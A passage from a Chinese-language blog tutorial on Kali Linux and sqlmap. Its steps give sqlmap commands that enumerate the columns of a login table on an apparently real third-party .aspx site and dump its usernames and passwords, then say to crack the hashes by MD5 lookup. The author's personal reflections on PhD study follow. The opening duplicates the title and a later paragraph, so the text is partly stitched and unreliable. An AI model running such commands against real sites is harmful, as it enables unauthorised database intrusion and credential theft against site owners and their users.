如何安装kali虚拟机：十一 网络安全.虚拟机VMware Kali安装入门及Sqlmap基本用法

如何安装kali虚拟机：十一 网络安全.虚拟机VMware Kali安装入门及Sqlmap基本用法如果字段内容太多，可以设置输出个数，如10个用户名和密码。参数：-D ahykd_new -T usr -C “usr_name passwd” --start 1 --stop 10 --dump第九步：获取数据库登录表用户名和密码。sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr -C "usr_name password" --dump获取数据库ahykd_new的登录表usr所有字段，其中-D表示数据库，-T表示表，-C表示输出字段（usr_name、passwd），–dump输出所有值。

第八步：获取数据库登录表所有字段。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr --columns

运行结果如下图所示，获取数据库ahykd_new的登录表usr所有字段，其中-D表示数据库，-T表示表，–columns表示usr表所有列。

是不是感觉到了SQLMAP的强大，其中用户名usr_name、密码passwd。

第九步：获取数据库登录表用户名和密码。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr -C "usr_name password" --dump

获取数据库ahykd_new的登录表usr所有字段，其中-D表示数据库，-T表示表，-C表示输出字段（usr_name、passwd），–dump输出所有值。

如果字段内容太多，可以设置输出个数，如10个用户名和密码。参数：-D ahykd_new -T usr -C “usr_name passwd” --start 1 --stop 10 --dump

正常的输出结果例如下图所示，再通过md5解密即可。

六.总结

又忙了16个小时，发现自己网络安全方向的基础非常薄弱，有太多实践知识想学，太多学术论文想看，每天都在忙碌，过程非常艰辛，博士哪有这么好毕业。但是这种苦中带甜，充实的滋味又让我陶醉，还有远方的女神、许多朋友和博友的陪伴。希望未来在网络态势感知、恶意代码检测、嫌疑识别和知识图谱方面能再深入点，多读文献，多找创新，加油。

天行健，君子以自强不息。

地势坤，君子以厚德载物。

最后希望基础性文章对您有所帮助，作者也是这个领域的菜鸟一枚，希望与您共同进步，共勉。